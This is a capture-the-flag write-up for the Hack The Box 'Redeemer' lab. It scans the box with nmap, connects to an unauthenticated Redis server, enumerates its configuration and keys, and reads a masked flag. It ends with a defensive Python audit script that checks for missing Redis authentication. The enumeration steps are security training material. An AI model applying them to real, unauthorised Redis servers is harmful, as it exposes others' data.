HTB Redeemer

This is one of the Starting Point HTB boxes.
It is rated as very easy and only has 1 flag.

$ nmap -p- -A 10.129.216.146 --min-rate 5000

Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-05 10:51 CEST
Nmap scan report for 10.129.216.146
Host is up (0.037s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
6379/tcp open  redis   Redis key-value store 5.0.7

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.54 seconds

So, we are facing a Redis v5.0.7 instance.

According to its site:

Redis is an open source (BSD licensed), in-memory data structure store used as a database, cache, message broker, and streaming engine. Redis provides data structures such as strings, hashes, lists, sets, sorted sets with range queries, bitmaps, hyperloglogs, geospatial indexes, and streams. Redis has built-in replication, Lua scripting, LRU eviction, transactions, and different levels of on-disk persistence, and provides high availability via Redis Sentinel and automatic partitioning with Redis Cluster.

https://redis.io/

Let’s try to enumerate this Redis instance.

$ redis-cli -h 10.129.216.146

10.129.216.146:6379> 

No credentials are needed.

The following commands return information about the Redis instance:

10.129.216.146:6379> info

# Server
redis_version:5.0.7
...
lru_clock:10252452
executable:/usr/bin/redis-server
config_file:/etc/redis/redis.conf

# Clients
connected_clients:1
...
blocked_clients:0

# Memory
used_memory:859624
used_memory_human:839.48K
used_memory_rss:6062080
...
mem_allocator:jemalloc-5.2.1
active_defrag_running:0
lazyfree_pending_objects:0

# Persistence
loading:0
rdb_changes_since_last_save:4
...
aof_last_cow_size:0

# Stats
total_connections_received:18
total_commands_processed:22
...
active_defrag_key_hits:0
active_defrag_key_misses:0

# Replication
role:master
...
repl_backlog_histlen:0

# CPU
used_cpu_sys:0.634172
...
used_cpu_user_children:0.000000

# Cluster
cluster_enabled:0

# Keyspace
db0:keys=4,expires=0,avg_ttl=0
...

10.129.216.146:6379> config get *

  1) "dbfilename"
  2) "dump.rdb"
  3) "requirepass"
  4) ""
  5) "masterauth"
  6) ""
  7) "cluster-announce-ip"
  8) ""
  9) "unixsocket"
 10) ""
 11) "logfile"
 12) "/var/log/redis/redis-server.log"
 13) "pidfile"
 14) "/var/run/redis/redis-server.pid"
 15) "slave-announce-ip"
 16) ""
...

From the info command we can see there is a database 0 with 4 keys.
Inside Redis, databases are numbered starting from 0.

10.129.216.146:6379> select 0

OK

10.129.216.146:6379> keys *

1) "stor"
2) "temp"
3) "numb"
4) "flag"

10.129.216.146:6379> GET flag

"03e1XXXXXXXXXXXXXXXXXXXXXXXXXXXX"
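
The same info and config get output can be checked on your own instance for the settings that left this one readable without a password. This is an added example, not part of the original write-up: the sample output is constructed in the shape of the session above, and the bind and protected-mode entries are assumed, since that part of the config output is elided on the page.

```python
import re

# Constructed sample output, shaped like the redis-cli session above.
# The "bind" and "protected-mode" entries are assumptions (elided on the page).
CONFIG_OUTPUT = '''
  1) "dbfilename"
  2) "dump.rdb"
  3) "requirepass"
  4) ""
  5) "masterauth"
  6) ""
  7) "bind"
  8) ""
  9) "protected-mode"
 10) "no"
'''
INFO_OUTPUT = '''
# Server
redis_version:5.0.7
# Keyspace
db0:keys=4,expires=0,avg_ttl=0
'''

def parse_config(text):
    """Pair up the alternating name/value lines printed by `config get *`."""
    items = re.findall(r'^\s*\d+\)\s+"(.*)"\s*$', text, re.MULTILINE)
    return dict(zip(items[0::2], items[1::2]))

def parse_keyspace(text):
    """Return {db_index: key_count} from the `# Keyspace` section of `info`."""
    return {int(db): int(keys)
            for db, keys in re.findall(r'^db(\d+):keys=(\d+)', text, re.MULTILINE)}

def audit(config, keyspace):
    """List the settings that allow unauthenticated remote access."""
    findings = []
    if config.get("requirepass", "") == "":
        findings.append("requirepass is empty: any client can run commands")
    if config.get("protected-mode") == "no":
        findings.append("protected-mode is off")
    if config.get("bind", "") == "":
        findings.append("bind is empty: listening on all interfaces")
    exposed = sum(keyspace.values())
    if findings and exposed:
        findings.append(f"{exposed} keys readable without authentication")
    return findings

if __name__ == "__main__":
    for line in audit(parse_config(CONFIG_OUTPUT), parse_keyspace(INFO_OUTPUT)):
        print("[!]", line)
```

An empty result from audit() means requirepass is set, protected-mode is on and bind names an explicit address.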